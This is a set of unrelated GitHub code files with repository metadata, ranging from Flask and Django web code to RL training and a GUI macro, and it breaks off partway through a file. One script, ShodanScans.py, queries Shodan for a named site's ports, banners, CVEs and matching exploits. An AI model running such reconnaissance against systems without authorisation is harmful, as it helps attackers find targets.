| google/pytype | pytype/tools/traces/traces_test.py | traces_test.py | py | 11,794 | python | en | code | 4,405 | github-code | 36 | [
{
"api_name": "sys.version_info",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pytype.tools.traces.traces.MatchAstVisitor",
"line_number": 22,
"usage_type": "attribute"
},
{
"api_name": "pytype.tools.traces.traces",
"line_number": 22,
"usage_type": "name... |
38801618139 | from transformers import pipeline
# classifier = pipeline('sentiment-analysis')
# res = classifier(
# 'We are not very happy to introduce pipeline to the transformers repository.')
pipe = pipeline('question-answering')
res = pipe({
'question': 'What is the name of the repository ?',
'context': 'Pipeline have been included in the huggingface/transformers repository'
})
print(res)
| taterboom/simple-tts | index.py | index.py | py | 397 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "transformers.pipeline",
"line_number": 7,
"usage_type": "call"
}
] |
39472235141 | import json
from flask import request, jsonify
from flask_restful import Resource
from werkzeug.exceptions import BadRequest
from managers.brand import BrandManager
from models import RoleType
from models.products import *
from schemas.request.brand import CreateBrandRequestSchema, EditBrandRequestSchema
from schemas.response.brand import (
CreateBrandResponseSchema,
BrandNameOnlyResponseSchema,
)
from utils.decorators import validate_schema, token_required, permission_required
from dotenv import load_dotenv
load_dotenv()
import cloudinary
import cloudinary.uploader
import cloudinary.api
config = cloudinary.config(secure=True)
class Brand(Resource):
@validate_schema(CreateBrandRequestSchema)
@permission_required(RoleType.admin)
def post(self):
# uploaded_files = request.files.get('file', '')
# print(uploaded_files)
# a = request
# print(a)
#
# upload_result = cloudinary.uploader.upload(uploaded_files)
# return jsonify(upload_result)
brand = BrandManager.create(request.get_json())
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
def get():
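# no query parameter returns brand names only, ?brand=all returns every brand, ?brand=<name> returns a single brand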
brand_name = request.args.get("brand")
schema = CreateBrandResponseSchema()
if not brand_name:
brands = BrandManager.get_all()
brand_name_schema = BrandNameOnlyResponseSchema()
return brand_name_schema.dumps(brands, many=True)
if brand_name == "all":
brands = BrandManager.get_all()
return schema.dumps(brands, many=True)
elif brand_name:
brands = BrandManager.get_by_name(brand_name)
return schema.dumps(brands)
raise BadRequest("You should use query parameters, check the documentation!")
class BrandUpdate(Resource):
@staticmethod
@permission_required(RoleType.admin)
def get(id_):
brand = BrandManager.get_by_id(id_)
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
@permission_required(RoleType.admin)
@validate_schema(EditBrandRequestSchema)
def put(id_):
brand = BrandManager.edit_brand(id_, request.get_json())
schema = CreateBrandResponseSchema()
return schema.dumps(brand)
@staticmethod
@permission_required(RoleType.admin)
def delete(id_):
result = BrandManager.delete(id_)
return json.dumps(result)
| a-angeliev/Shoecommerce | server/resources/brand.py | brand.py | py | 2,486 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cloudinary.config",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "flask_restful.Resource",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "managers.... |
38672578742 | import shodan
import requests
from shodan import Shodan
'''
api = Shodan('Insert_your_Shodan_Api_Key')
print(api.search(query='product:nginx', facets='country,org'))
'''
SHODAN_API_KEY = "Insert_your_Shodan_Api_Key"
api = shodan.Shodan(SHODAN_API_KEY)
target = 'www.packtpub.com'
dnsResolve = 'https://api.shodan.io/dns/resolve?hostnames=' + target + '&key=' + SHODAN_API_KEY
Data={}
try:
# First we need to resolve our targets domain to an IP
resolved = requests.get(dnsResolve)
hostIP = resolved.json()[target]
# Then we need to do a Shodan search on that IP
host = api.host(hostIP)
Data['Ip']=host['ip_str']
Data['Organization']=host.get('org')
Data['Operating System']=host.get('os')
#print ("IP: %s" % host['ip_str'])
#print ("Organization: %s" % host.get('org', 'n/a'))
#print ("Operating System: %s" % host.get('os', 'n/a'))
# Print all banners
for item in host['data']:
Data['Port']=item['port']
Data['Banner']=item['data']
#print ("Port: %s" % item['port'])
#print ("Banner: %s" % item['data'])
# Print vuln information
for item in host['vulns']:
CVE = item.replace('!','')
Data['Vulnerability']=item
print ('Vulns: %s' % item)
exploits = api.exploits.search(CVE)
for item in exploits['matches']:
if item.get('cve')[0] == CVE:
Data['Description']=item.get('description')
print (item.get('description'))
except Exception as e:
print('An error occurred: %s' % e)
| MuhammadAli947/shodanCode | ShodanScans.py | ShodanScans.py | py | 1,526 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "shodan.Shodan",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 19,
"usage_type": "call"
}
] |
36211707503 | #file a transaction
#any changes to the users balanace should be reflected in the account file
import datetime
def transaction_options(accounts_path, line_number):
stay_logged_in = True
while stay_logged_in == True:
ask = input('Would you like to make a transaction, return to the homepage, or logout (T/H/L)? ').upper()
if ask == 'T':
transaction(accounts_path, line_number)
elif ask == 'H':
return homepage()
elif ask == 'L':
return logout()
else:
print ('Invalid input')
def transaction(accounts_path, line_number):
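#record one transaction (counterparty, signed amount, date) in the account's history file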
person_involved = input('First input the other entity involved in the transaction: ')
transaction_amount = ''
continue_transaction = True
while continue_transaction == True:
money = input("Next tell us the money transferred, if you spent money add a '-' in front of the amount: ")
#strip a leading '-' so a negative amount still validates as digits only
digits = money[1:] if money.startswith('-') else money
if not digits.isnumeric():
print ('Money must contain only numbers')
continue
transaction_amount = money
continue_transaction = False
#ask the user for the date of the transaction
#syntax check for the date
#write the other entity, amount of money, and date into the transaction history file
enter_date = True
while enter_date == True:
date_of_transaction = input('Lastly, tell us the date this transaction occurred, use the format yyyy-mm-dd: ')
format = '%Y-%m-%d'
try:
datetime.datetime.strptime(date_of_transaction, format)
except ValueError:
print ('This is the incorrect date format, please try again')
continue
break
#get the account number so we can open their transaction history
with open(accounts_path, 'r') as accounts_file:
#list of all the lines in the accounts file where each item is 1 line from the file
accounts_list = accounts_file.readlines()
#split the string at index line_number into a list of separate values
split_line = accounts_list[line_number].split(', ')
#if the 2nd element in the split_line list matches the inputted password, the user has successfully logged in
account_number = split_line[0]
#this needs to print on a newline
with open (f'{account_number}.txt', 'a') as transaction_history:
transaction_history.write(f'{person_involved}, {transaction_amount}, {date_of_transaction}\n')
#open the file
#find the line where the account number matches
#change the balance value
#re write the whole file
# with open(accounts_path, 'r') as accounts_file:
# #list of all the lines in the accounts file where each item is 1 line from the file
# accounts_list = accounts_file.readlines()
# #split the string at index line_number into a list of separate values
# split_line = accounts_list[line_number].split(', ')
# #if the 2nd element in the split_line list matches the inputted password, the user has successfully logged in
# account_number = split_line[4]
def homepage():
print ('Returning to the homepage')
return True
def logout():
print ('Logging you out now, returning to login screen')
return False
| 2105-may24-devops/fletcher-project0 | transaction_module.py | transaction_module.py | py | 3,661 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime.strptime",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 57,
"usage_type": "attribute"
}
] |
11371604753 | import logging
from sklearn.metrics import accuracy_score
from pytorch_tabular import TabularModel
from pytorch_tabular.config import DataConfig, OptimizerConfig, TrainerConfig
from ml.solvers.base_solver import Solver
class PytorchTabularSolver(Solver):
def init_model(self):
super(PytorchTabularSolver, self).init_model()
data_config = DataConfig(
target=['Y'],
# target should always be a list. Multi-targets are only supported for regression. Multi-Task Classification is not implemented
continuous_cols=list(self.val_loader.df_data[0].select_dtypes(include=['int64']).columns),
categorical_cols=list(self.val_loader.df_data[0].select_dtypes(include=['object', 'uint8']).columns),
validation_split=0.0)
trainer_config = TrainerConfig(**self.config.trainer.params.dict()) # index of the GPU to use. 0, means CPU
optimizer_config = OptimizerConfig()
self.model = TabularModel(data_config=data_config,
model_config=self.model,
optimizer_config=optimizer_config,
trainer_config=trainer_config)
def load_model(self):
try:
self.model = TabularModel.load_from_checkpoint(self.result_dir)
except FileNotFoundError as e:
logging.info('No saved model found: no model is loaded.')
def train(self):
"""
Training the tree based networks.
Save the model if it has better performance than the previous ones.
"""
self.model.fit(train=self.train_loader.df,
validation=self.val_loader.df)
# save model
self.model.save_model(self.result_dir)
self.eval()
self.save_acc()
def eval(self):
"""
Evaluate the model.
"""
preds = self.model.predict(self.val_loader.df_data[0]).prediction.to_numpy()
gt = self.val_loader.data[1]
self.accuracy = accuracy_score(preds, gt)
print(self.accuracy)
if self.config.env.save_preds:
self.save_preds(preds)
| gregiberri/coupon | ml/solvers/pytorch_tabular_solver.py | pytorch_tabular_solver.py | py | 2,165 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "ml.solvers.base_solver.Solver",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "pytorch_tabular.config.DataConfig",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pytorch_tabular.config.TrainerConfig",
"line_number": 20,
"usage_type": "... |
40587003321 | from django.contrib.auth.base_user import AbstractBaseUser
from django.contrib.auth.decorators import login_required
from django.http import (HttpRequest, HttpResponse, HttpResponseNotFound,
HttpResponseRedirect)
from django.shortcuts import redirect, render
from django.urls import reverse_lazy
from django.views.decorators.cache import cache_page
from core import constants as const
from core.db_queries import Query
INDEX_URL = reverse_lazy('questions:index')
QUESTIONS_URL = reverse_lazy('questions:questions')
FINISH_URL = reverse_lazy('questions:finish_test')
# @cache_page(timeout=20, key_prefix='index') # 10 minutes
def index(request: HttpRequest):
"""Обработчик для главной страницы.
"""
context = {
'title' : const.TITLE,
'card_header' : const.INDEX_CARD_HEADER,
'index_page_text' : const.INDEX_PAGE_TEXT,
'maximum_grade' : Query.get_maximum_grade(),
}
return render(request, 'index.html', context)
# @cache_page(timeout=60, key_prefix='rating') # 1 minute
def rating(request: HttpRequest):
"""Показывает рейтинг пользователей.
"""
context = {
'title' : const.TITLE,
'header' : const.ALL_RESULTS_CARD_HEADER,
'results' : Query.get_users_rating()
}
return render(request, 'questions/results.html', context)
@login_required
def my_results(request: HttpRequest):
"""Показывает все результаты текущего пользователя.
"""
user: AbstractBaseUser = request.user
context = {
'title' : const.TITLE,
'header' : const.MY_RESULTS_CARD_HEADER,
'results' : Query.get_user_results(user)
}
return render(request, 'questions/results.html', context)
def get_question(
request: HttpRequest
):
"""Выводит очередной вопрос и учитывает ответы.
Если предыдущий тест был случайно прерван, продолжит предыдущий тест.
"""
user: AbstractBaseUser = request.user
if user.is_anonymous:
return redirect(INDEX_URL)
question = Query.get_next_question(user=user)
if question is None:
return redirect(FINISH_URL)
context = {
'title' : const.TITLE,
'question' : question,
'button_type' : ('radio', 'checkbox')[question.many_answers]
}
return render(request, 'questions/question.html', context)
@login_required
def add_answer(
request: HttpRequest,
question_pk: int
):
"""Учитывает переданные пользователем ответы.
"""
question = Query.get_current_question(
question_pk=question_pk
)
if question is None:
return HttpResponseNotFound('<h1>Page not found</h1>')
context = {
'title' : const.TITLE,
'question' : question,
'button_type' : ('radio', 'checkbox')[question.many_answers]
}
choice = request.POST.getlist('answer')
if not choice:
context['error_message'] = const.ERR_NO_ANSWERS
return render(request, 'questions/question.html', context)
if not Query.update_result(
user =request.user,
question_pk =question_pk,
choice =choice
):
context['error_message'] = const.ERR_FALSE_ANSWERS
return render(request, 'questions/question.html', context)
return redirect(QUESTIONS_URL)
def to_finish_test(
request: HttpRequest
) -> HttpResponse | HttpResponseRedirect:
"""Завершает тест.
Если пользователь не проходил тестов, либо пытается завершить без
отмеченных ответов, перекидывает на главную страницу.
Начатый тест будет продолжен в дальнейшем.
"""
user: AbstractBaseUser = request.user
if user.is_anonymous:
return redirect(INDEX_URL)
closed, current_result = Query.close_last_result(user)
if not closed:
return redirect(INDEX_URL)
context = {
'title' : const.TITLE,
'header' : const.FINISH_CARD_HEADER,
'result' : current_result
}
return render(request, 'questions/finish.html', context)
| Xewus/Examiner | src/questions/views.py | views.py | py | 4,430 | python | ru | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.reverse_lazy",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "django.urls.reverse_lazy",
"line_number": 14,
"usage_type": "call"
},
{
"api_na... |
39479105306 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand, CommandError
from cards.search import searchservice
from cards.models import Card, BaseCard
from cards.models import PhysicalCard
import json
from django.utils import dateparse
import codecs
import sys
from elasticsearch import Elasticsearch, exceptions
from kitchen.text.converters import getwriter
class Command(BaseCommand):
def add_arguments(self, parser):
parser.add_argument('--full', dest='full', action='store_true',
help='Rebuild the entire index, not just data that has changed.')
def handle(self, *args, **options):
# check the card index
self.checkCardIndex()
self.checkCardnameIndex()
# first, let's get the most recent doc change in ES:
lmt_q = {
"query": {"match_all": {}},
"size": 1,
"sort": [
{
"_update_datetime": {
"order": "desc"
}
}
]
}
lmt_res = searchservice.search(index='card', body=lmt_q)
last_time = None
try:
sys.stdout.write("timestamp: {}\n".format(json.dumps(lmt_res['hits']['hits'][0]['_source']['_update_datetime'])))
last_time = dateparse.parse_datetime(lmt_res['hits']['hits'][0]['_source']['_update_datetime'])
except KeyError:
# no doc, I guess
pass
sys.stdout.write("'card' index last updated {}\n".format(last_time))
pcs = None
if not last_time or options['full']:
sys.stdout.write("Re-indexing entire card database...\n")
pcs = PhysicalCard.objects.all()
#pcs = PhysicalCard.objects.filter(pk__gte=15200, pk__lt=15800)
else:
cards = Card.objects.filter(updated_at__gte=last_time)
bc_ids = {}
for card in cards:
bc_ids[card.basecard_id] = True
basecards = BaseCard.objects.filter(updated_at__gte=last_time)
pc_ids = {}
for basecard in basecards:
#sys.stderr.write("bc -> pc {}\n".format(basecard.physicalcard_id))
pc_ids[basecard.physicalcard_id] = True
basecards = BaseCard.objects.filter(id__in=[bc_id for bc_id in bc_ids])
for basecard in basecards:
pc_ids[basecard.physicalcard_id] = True
pcs = PhysicalCard.objects.filter(id__in=[pc_id for pc_id in pc_ids])
total_count = pcs.count()
counter = 0
sys.stdout.write("Cards to index: {}\n".format(total_count))
for pc in pcs:
searchservice.index_physicalcard(pc)
counter += 1
if counter % 100 == 0:
sys.stdout.write("{:>6} : {:>4.0%} complete\n".format(counter, float(counter) / float(total_count)))
sys.stdout.write("Complete!\n")
def checkCardIndex(self):
index_name = 'card'
try:
val = searchservice._es.indices.get_settings(index_name)
except exceptions.NotFoundError:
sys.stdout.write("'{}' index does not exist. Creating it...\n".format(index_name))
searchservice._es.indices.create(index=index_name,
body={})
return True
def checkCardnameIndex(self):
index_name = 'cardname'
cur_mappings = None
try:
cur_mappings = searchservice._es.indices.get_mapping(index_name)
except exceptions.NotFoundError:
sys.stdout.write("'{}' index does not exist. Creating it...\n".format(index_name))
with open('elasticsearch/cardname_settings.json', 'r') as cnsjson_fh:
cns = json.load(cnsjson_fh)
sys.stdout.write("Creating '{}' index with:\n{}\n".format(index_name, json.dumps(cns, indent=2)))
searchservice._es.indices.create(index=index_name,
body=cns)
if cur_mappings:
# we need to validate that there is an ngram field on the "name" property. If there isn't, we should bail.
# cur_settings['cardname']['settings']['index']
# BOOKMARK - check to see if there is an ngram mappings on "name"
try:
ngram = cur_mappings[index_name]['mappings']['cardname']['properties']['name']['fields']['ngram']
slug = cur_mappings[index_name]['mappings']['cardname']['properties']['slug']
lmvid = cur_mappings[index_name]['mappings']['cardname']['properties']['latest_multiverseid']
except KeyError as ke:
sys.stdout.write("{} index does not have an 'ngram' field on 'name'.\n".format(index_name))
sys.stdout.write("{} index Mappings:\n{}\n".format(index_name, json.dumps(cur_mappings, indent=2)))
sys.stdout.write("Aborting.\n")
# You may need to drop the old index and start over.
sys.stdout.write("Try this to get the index started...\n")
sys.stdout.write("curl -X DELETE '{}:{}/{}?pretty'\n".format(searchservice._host, searchservice._port, index_name))
sys.stdout.write(
"curl -X PUT '{}:{}/{}?pretty' -H 'Content-Type: application/json' -d @elasticsearch/cardname_settings.json\n".format(
searchservice._host,
searchservice._port,
index_name))
raise ke
return True
| jcrickmer/mtgdbpy | cards/management/commands/reindex_es.py | reindex_es.py | py | 5,648 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "cards.search.searchservice.search",
"line_number": 45,
"usage_type": "call"
},
{
"api_name": "cards.search.searchservice",
"line_number": 45,
"usage_type": "... |
26419037040 | import datetime
from functools import wraps
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
def authentication_required(function=None):
def decorator(view_func):
@wraps(view_func)
def _wrapped_view(request, *args, **kwargs):
session = request.session
if session.get("provider") \
and session.get("patient_id") \
and session.get("patient") \
and session.get("access_token") \
and session.get("expiration"):
expiration = session.get("expiration")
if isinstance(expiration, datetime.datetime) and expiration > timezone.now():
return view_func(request, *args, **kwargs)
# Clear the session if authentication failed.
request.session.flush()
return HttpResponseRedirect(reverse("pisces:index"))
return _wrapped_view
if function:
return decorator(function)
return decorator
| qiuosier/Pisces | decorators.py | decorators.py | py | 1,068 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "django.utils.timezone.now",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "django.utils.timezone",
"line_number": 19,
"usage_type": "name"
},
{
"api_name":... |
73574130663 | import torch
import torch.nn as nn
import torch.nn.functional as F
from policy import discrete_policy_net
from critic import attention_critic
import numpy as np
from buffer import replay_buffer
from make_env import make_env
import os
import random
from gym.spaces.discrete import Discrete
from gym.spaces.box import Box
import time
class maac_mpe(object):
def __init__(self, env_id, batch_size, learning_rate, exploration, episode, gamma, alpha, capacity, rho, update_iter, update_every, head_dim, traj_len, render):
self.env_id = env_id
#self.env = make_env(self.env_id, discrete_action=True)
self.env = make_env(self.env_id)
self.batch_size = batch_size
self.learning_rate = learning_rate
self.exploration = exploration
self.episode = episode
self.gamma = gamma
self.capacity = capacity
self.rho = rho
self.update_iter = update_iter
self.update_every = update_every
self.head_dim = head_dim
self.traj_len = traj_len
self.render = render
self.observation_dims = [int(self.env.observation_space[i].shape[0]) for i in range(self.env.n)]
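# Discrete spaces expose their size via .n; Box spaces fall back to the sum of their high bounds plus the shape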
self.action_dims = [int(self.env.action_space[i].n) if isinstance(self.env.action_space[i], Discrete) else int(sum(self.env.action_space[i].high) + self.env.action_space[i].shape) for i in range(self.env.n)]
self.alphas = [alpha for _ in range(self.env.n)]
self.value_net = attention_critic(num_agent=self.env.n, sa_dims=[o + a for o, a in zip(self.observation_dims, self.action_dims)], s_dims=self.observation_dims, head_dim=self.head_dim, output_dim=self.action_dims)
self.target_value_net = attention_critic(num_agent=self.env.n, sa_dims=[o + a for o, a in zip(self.observation_dims, self.action_dims)], s_dims=self.observation_dims, head_dim=self.head_dim, output_dim=self.action_dims)
self.policy_nets = [discrete_policy_net(input_dim=self.observation_dims[n], output_dim=self.action_dims[n]) for n in range(self.env.n)]
self.target_policy_nets = [discrete_policy_net(input_dim=self.observation_dims[n], output_dim=self.action_dims[n]) for n in range(self.env.n)]
[self.target_policy_nets[n].load_state_dict(self.policy_nets[n].state_dict()) for n in range(self.env.n)]
self.target_value_net.load_state_dict(self.value_net.state_dict())
self.buffer = replay_buffer(capacity=self.capacity)
self.value_optimizer = torch.optim.Adam(self.value_net.parameters(), lr=self.learning_rate, weight_decay=1e-3)
self.policy_optimizers = [torch.optim.Adam(self.policy_nets[n].parameters(), lr=self.learning_rate) for n in range(self.env.n)]
self.count = 0
self.train_count = 0
def soft_value_update(self):
for param, target_param in zip(self.value_net.parameters(), self.target_value_net.parameters()):
target_param.detach().copy_(param.detach() * (1 - self.rho) + target_param.detach() * self.rho)
def soft_policy_update(self, policy_idx):
for param, target_param in zip(self.policy_nets[policy_idx].parameters(), self.target_policy_nets[policy_idx].parameters()):
target_param.detach().copy_(param.detach() * (1 - self.rho) + target_param.detach() * self.rho)
def train(self):
for _ in range(self.update_iter):
observations, actions, rewards, next_observations, dones = self.buffer.sample(self.batch_size)
indiv_observations = [torch.FloatTensor(np.vstack([observations[b][n] for b in range(self.batch_size)])) for n in range(self.env.n)]
indiv_actions = [torch.FloatTensor([actions[b][n] for b in range(self.batch_size)]) for n in range(self.env.n)]
one_hot_indiv_actions = [torch.zeros(self.batch_size, self.action_dims[n]) for n in range(self.env.n)]
one_hot_indiv_actions =[one_hot_indiv_actions[n].scatter(dim=1, index=indiv_actions[n].unsqueeze(1).long(), value=1) for n in range(self.env.n)]
rewards = torch.FloatTensor(rewards)
indiv_rewards = [rewards[:, n] for n in range(self.env.n)]
indiv_next_observations = [torch.FloatTensor(np.vstack([next_observations[b][n] for b in range(self.batch_size)])) for n in range(self.env.n)]
dones = torch.FloatTensor(dones)
indiv_dones = [dones[:, n] for n in range(self.env.n)]
# * many times to train for same batch trajectories
# * Critic training
one_hot_next_actions = []
next_actions = []
next_log_policies = []
for i in range(self.env.n):
# * sampling all actions, a, from all agents’ current policies in order to calculate the gradient estimate for agent i
next_action, next_log_policy = self.target_policy_nets[i].forward(indiv_next_observations[i], log=True)
next_log_policies.append(next_log_policy)
next_actions.append(next_action)
one_hot_next_action = torch.zeros(self.batch_size, self.action_dims[i])
one_hot_next_action.scatter_(dim=1, index=next_action, value=1)
one_hot_next_actions.append(one_hot_next_action)
next_q = self.target_value_net.forward(indiv_next_observations, one_hot_next_actions)
q, reg_atten = self.value_net.forward(indiv_observations, one_hot_indiv_actions, reg=True)
value_loss = 0
for i in range(self.env.n):
# * soft operation: - self.alphas[i] * next_log_policies[i]
target_q = indiv_rewards[i].unsqueeze(1) + (1 - indiv_dones[i].unsqueeze(1)) * self.gamma * next_q[i] - self.alphas[i] * next_log_policies[i]
target_q = target_q.detach()
value_loss += (q[i] - target_q).pow(2).mean()
for reg_a in reg_atten:
value_loss += reg_a
self.value_optimizer.zero_grad()
value_loss.backward()
# * scale the shared parameters' grad
for p in self.value_net.get_shared_parameters():
p.grad.data.mul_(1. / self.env.n)
nn.utils.clip_grad_norm_(self.value_net.parameters(), 10 * self.env.n)
self.value_optimizer.step()
one_hot_sample_actions = []
sample_actions = []
log_policies = []
entropies = []
all_policies = []
reg_policies = []
for i in range(self.env.n):
# * sampling all actions, a, from all agents’ current policies in order to calculate the gradient estimate for agent i
sample_action, reg_policy, log_policy, entropy, all_policy = self.policy_nets[i].forward(indiv_observations[i], explore=True, log=True, reg=True, entropy=True, all=True)
sample_actions.append(sample_action)
reg_policies.append(reg_policy)
log_policies.append(log_policy)
entropies.append(entropy)
all_policies.append(all_policy)
one_hot_sample_action = torch.zeros(self.batch_size, self.action_dims[i])
one_hot_sample_action.scatter_(dim=1, index=sample_action, value=1)
one_hot_sample_actions.append(one_hot_sample_action)
q, all_q = self.value_net(indiv_observations, one_hot_sample_actions, all=True)
for i in range(self.env.n):
b = torch.sum(all_policies[i] * all_q[i], dim=1, keepdim=True).detach()
# * COMA
adv = (q[i] - b).detach()
# * soft operation: self.alphas[i] * log_policies[i]
policy_loss = log_policies[i] * (self.alphas[i] * log_policies[i] - adv).detach()
policy_loss = policy_loss.mean() + reg_policies[i] * 1e-3
self.policy_optimizers[i].zero_grad()
for p in self.value_net.parameters():
p.requires_grad = False
policy_loss.backward()
for p in self.value_net.parameters():
p.requires_grad = True
nn.utils.clip_grad_norm_(self.policy_nets[i].parameters(), 0.5)
self.policy_optimizers[i].step()
self.soft_value_update()
for i in range(self.env.n):
self.soft_policy_update(i)
def run(self):
max_reward = -np.inf
weight_reward = [None for i in range(self.env.n)]
for epi in range(self.episode):
self.env.reset()
if self.render:
self.env.render()
total_reward = [0 for i in range(self.env.n)]
obs = self.env.reset()
while True:
action_indice = []
actions = []
for i in range(self.env.n):
if epi >= self.exploration:
action_idx = self.policy_nets[i].forward(torch.FloatTensor(np.expand_dims(obs[i], 0)), explore=True).item()
else:
action_idx = np.random.choice(list(range(self.action_dims[i])))
action = np.zeros(self.action_dims[i])
action[action_idx] = 1
actions.append(action)
action_indice.append(action_idx)
next_obs, reward, done, _ = self.env.step(actions)
if self.render:
self.env.render()
self.buffer.store(obs, action_indice, reward, next_obs, done)
self.count += 1
total_reward = [tr + r for tr, r in zip(total_reward, reward)]
obs = next_obs
if (self.count % self.update_every) == 0 and epi >= self.exploration and self.batch_size <= len(self.buffer):
self.train_count += 1
self.train()
if self.count % self.traj_len == 0:
done = [True for _ in range(self.env.n)]
if any(done):
if weight_reward[0] is None:
weight_reward = total_reward
else:
weight_reward = [wr * 0.99 + tr * 0.01 for wr, tr in zip(weight_reward, total_reward)]
if sum(weight_reward) > max_reward and epi >= self.exploration:
torch.save(self.value_net, './models/{}/value.pkl'.format(self.env_id))
for i in range(self.env.n):
torch.save(self.policy_nets[i], './models/{}/policy{}.pkl'.format(self.env_id, i))
max_reward = sum(weight_reward)
print(('episode: {}\ttrain_count:{}\tweight_reward:' + '{:.1f}\t' * self.env.n + 'sum:{:.1f}').format(epi + 1, self.train_count, *weight_reward, sum(weight_reward)))
break
def eval(self, render=True):
self.count = 0
for i in range(self.env.n):
self.policy_nets[i] = torch.load('./models/{}/policy{}.pkl'.format(self.env_id, i))
while True:
obs = self.env.reset()
total_reward = [0 for i in range(self.env.n)]
if render:
self.env.render()
while True:
time.sleep(0.05)
actions = []
                for n in range(self.env.n):
                    # fix: use the inner loop variable n (the original reused the stale
                    # index i left over from the model-loading loop above)
                    action = np.zeros(self.action_dims[n])
                    action_idx = self.policy_nets[n].forward(torch.FloatTensor(np.expand_dims(obs[n], 0)), explore=True).item()
                    action[action_idx] = 1
                    actions.append(action)
next_obs, reward, done, info = self.env.step(actions)
if render:
self.env.render()
total_reward = [total_reward[i] + reward[i] for i in range(self.env.n)]
obs = next_obs
self.count += 1
if any(done) or self.count % self.traj_len == 0:
print('episode: {}\treward: {}'.format(i + 1, total_reward))
break
| deligentfool/MAAC_pytorch | model_mpe.py | model_mpe.py | py | 12,313 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "make_env.make_env",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "gym.spaces.discrete.Discrete",
"line_number": 34,
"usage_type": "argument"
},
{
"api_name": "critic.attention_critic",
"line_number": 38,
"usage_type": "call"
},
{
"api_na... |
38650316304 | #%%
import pyautogui, pyperclip
Y = 550 # 507
X = 800 # 740
pyperclip.copy("직")
pyautogui.moveTo(x=X, y=Y, duration=0.001)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("업")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("상")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("담")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
pyperclip.copy("사")
pyautogui.moveTo(x=X, y=Y, duration=1)
pyautogui.click(clicks=1)
pyautogui.hotkey("ctrl", "v")
print(pyautogui.position())
print(pyautogui.size())
print(pyautogui.onScreen(1000,2000))
print(pyautogui.onScreen(1000,1000))
# x 740 / y 507
#%%
# OCR
import pytesseract, pyautogui
from PIL import ImageGrab
from textblob import TextBlob
pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'
screen = ImageGrab.grab(bbox=(600, 300, 1200, 800))
w = screen.convert('L')
w.save('/Users/shetshield/Desktop/python_ws/grabbed.png')
text = pytesseract.image_to_string(w)
arr = text.split('\n')[0:-1]
res = '\n'.join(arr)
# correctedText = TextBlob(text).correct().string
# print(correctedText)
print(res)
| shetshield/src | stitching_img/pymacro.py | pymacro.py | py | 1,353 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pyperclip.copy",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pyautogui.moveTo",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pyautogui.click",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pyautogui.hotkey",
"... |
38313990919 | from flask import flash
from flask_app.config.mysqlconnection import connectToMySQL
from flask_app.models import user
from flask_app.models import message
class Event:
db = "plannendar_schema"
def __init__(self, data):
self.id = data['id']
self.event = data['event']
self.description = data['description']
self.activities = data['activities']
self.start_date = data['start_date']
self.end_date = data['end_date']
self.location = data['location']
self.user_id = data['user_id']
self.created_at = data['created_at']
self.updated_at = data['updated_at']
self.creator = None
@classmethod
def save(cls, data):
query = "INSERT INTO events (event, description, activities, start_date, end_date, location, user_id) VALUES (%(event)s,%(description)s,%(activities)s,%(start_date)s,%(end_date)s,%(location)s,%(user_id)s);"
return connectToMySQL(cls.db).query_db(query, data)
@classmethod
def add_guests(cls, data):
query = 'INSERT INTO guests (event_id, user_id) VALUES (%(event_id)s,%(user_id)s);'
return connectToMySQL(cls.db).query_db(query, data)
@classmethod
def get_all(cls):
query = '''SELECT * FROM events
JOIN users
ON events.user_id = users.id;'''
results = connectToMySQL(cls.db).query_db(query)
all_events = []
for row in results:
one_event = cls(row)
user_data = {
"id": row["users.id"],
"first_name": row["first_name"],
"last_name": row["last_name"],
"email": row["email"],
"password": "not telling",
"created_at": row["users.created_at"],
"updated_at": row["users.updated_at"]
}
one_event.guests = user.User.get_event_guests(
{"event_id": one_event.id})
one_event.creator = user.User(user_data)
all_events.append(one_event)
return all_events
@classmethod
def get_user_events(cls, data):
query = """SELECT * FROM events
JOIN users
ON events.user_id = users.id
WHERE events.id = %(id)s;"""
results = connectToMySQL(cls.db).query_db(query, data)
for row in results:
one_event = cls(row)
user_data = {
"id": row["users.id"],
"first_name": row["first_name"],
"last_name": row["last_name"],
"email": row["email"],
"password": "not telling",
"created_at": row["users.created_at"],
